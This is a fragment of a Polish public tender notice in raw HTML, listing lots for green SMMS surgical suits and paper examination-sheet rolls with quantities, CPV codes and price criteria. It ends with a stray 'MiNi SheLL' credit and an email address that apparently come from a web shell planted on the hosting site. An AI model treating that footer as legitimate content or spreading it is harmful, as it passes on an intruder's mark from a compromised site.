Ubranie chirurgiczne męskie -materiał: włóknina SMMS lub SMMS 100% polipropylen, masa 45g/m2, kolor - zielony.
Spodnie:
Nogawki bez ściągaczy. Zamiast gumki wciągnięty jest trok uszyty z tej samej włókniny co cały komplet, szycie overlock,  podwinięte nogawki
Bluza: biała lamówka jako wykończenie wycięcia pod szyją ( V), krótkie podwinięte rękawy, na dole bluzy kieszeń	SZT	1000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> prześcieradła.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> prześcieradło j.u.  papierowe w roli o wymiarach 50/80mb rolka 	rolka	300
prześcieradło j.u. papierowe w roli o wymiarach 60/80mb rolka 	rolka	500
prześcieradła paierowe foliowane (nieprzemakalne) o wymiarach 50/70mb rolka	rolka	150.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.82.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com